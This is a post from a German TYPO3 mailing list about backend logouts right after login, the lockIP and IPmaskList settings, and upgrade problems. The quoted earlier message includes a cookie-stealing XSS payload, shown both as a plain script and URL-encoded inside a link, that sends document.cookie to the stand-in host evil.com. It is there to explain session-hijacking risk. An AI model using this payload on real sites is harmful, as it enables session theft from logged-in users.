[TYPO3-german] [TYPO3 german] TYPO3 4.2.6 und 4.3.0alpha2 Logout sofort nach Login im Backend

Fri Apr 17 17:51:13 CEST 2009

Danke Christian fuer die Erklaerung
Das mit dem Proxy ist schon klar daran hatten wir auch als erstes gedacht,
zumal bei uns ja auslaendische Seitenzugriffe oft noch ueber die Zensur
laufen, da jedoch auch unsere USA und Rumaenien Developer das gleiche
Problem hatten, schlossen wir das Proxy Problem aus - der Server auf den die
Installationen laufen mit den Login Problemen steht in den USA und deren
Techniker konnten auch nix in den Logs feststellen.

Was uns noch aufgefallen ist:
Bei Version 4.1.10 haben wir das problem nicht mit dem Login. Jedoch haben
wir es ab 4.2.2 aufwaerts.
Wir haben einfach einmal die sources durch probiert.

Bei 4.3.0alpha2 ist uns zudem aufgefallen, dass anscheinend ziemlich viele
Tables neu angelegt/geloescht bzw. modifiziert werden. Selbst wenn man von
4.2.6 updated. Als wir den compare bei einem Update von 4.2.6 auf
4.3.0alpha2 durchfuehrten brachte dies eine unendliche liste hervor obwohl
das Update Modul im Installtool angeblich alles bereits erledigt und
abgeschlossen hat. Wir haben den Compare durchgefuehrt und alle checkboxen
gesetzt und nun funktioniert diese Installation gut - aber eben mit dem
iPlog abgeschaltet.

Zum Glueck bietet TYPO3 ja verschiedenste Moeglichkeiten die
Sicherheitslatte hoeher zu setzen.
Eine ist sicher auch

*[IPmaskList]*String. Lets you define a list of IP-numbers (with
*-wildcards) that are the ONLY ones allowed access to ANY backend activity.
On error an error header is sent and the script exits. Works like IP masking
for users configurable through TSconfig. See syntax for that (or look up
syntax for the function t3lib_div::cmpIP())

Somit kann man dann evtl. die Zahl der moeglichen Angreifer moeglichst
eingrenzen, auch wenn man (in unserem Fall der Kunde) keine  Fix IP hat. Man
muss halt die IP Ranges des Providers erfragen und diese hier eingeben.

Das Backend bei den eingegeben IPs wird normal angezeigt und ansonsten
bleibt die Seite weiss - auch die des Installtools!

Gruss Andi

2009/4/17 Martin Schoenbeck <ms.usenet.nospam at schoenbeck.de>

> Hallo Christian,
>
> Christian Wolff schrieb:
>
> > Hi Martin,
> > https ist ist natürlich eine gute maßname. aber man sollte nicht davon
> > ausgehen das es das stehelen deines cookies unmöglich macht.
>
> Nein, es verhindert natürlich nur banales mitprotokollieren.
>
> > folgens javascript würde auch trotz https deinen cookie klauen:
> >
> > <script>
> > new Image().src="https://evil.com/log.php?c=
> "+encodeURI(document.cookie);
> > </script>
> >
> >
> > vorrausgesetzt jemand schaft es das auf irgend eine weise das auf deiner
> > domain zu platzieren.
>
> Klar. Muß er aber eben erstmal schaffen.
>
> > z.b durch eine extension die URL Parameter wieder auf der seite ausgibt.
> > dann könnte eine entsprechende URL den angrif enthalten.
>
> Nur warum sollte er sich dann die Mühe machen, das Cookie zu klauen, wenn
> er doch direkt per Javascript meinen Server steuern kann.
>
> > und der angreifer schreibt dir einfach eine mail:
> > hey auf deiner seite passiert irgendwas komisches. hier die URL:
> >
> >
> https://www.good.de/index.php?id=13&tx_badExt%5Bdata%5D=%3Cscript%3E+new+Image().src%3D%22http%3A%2F%2Fevil.com%2Flog.cgi%3Fc%3D%22%2BencodeURI(document.cookie)%3B+%3C%2Fscript%3E
> >
> > du klickst guten glaubens auf die den link.
>
> Ähm nein. Mach ich nicht. Müßte ich ja einen an der Klatsche haben. Schon
> gerade, wenn ich noch eingeloggt bin.
>
> > und das script würde den
> > cookie auf evil.com loggen. vorrausgesetzt du warst gerade angemeldet.
> >
> > lockIP abzuschalten alleine ist keine sicherheitslück es setzt aber den
> > schwierigkeits grad für einen angreifer herunter.
>
> Klar. Sonst hätte man das ja auch nicht extra kodiert.
>
> Gruß Martin
> --
> Bitte nicht an der E-Mail-Adresse fummeln, die paßt so.
> _______________________________________________
> TYPO3-german mailing list
> TYPO3-german at lists.netfielders.de
> http://lists.netfielders.de/cgi-bin/mailman/listinfo/typo3-german
>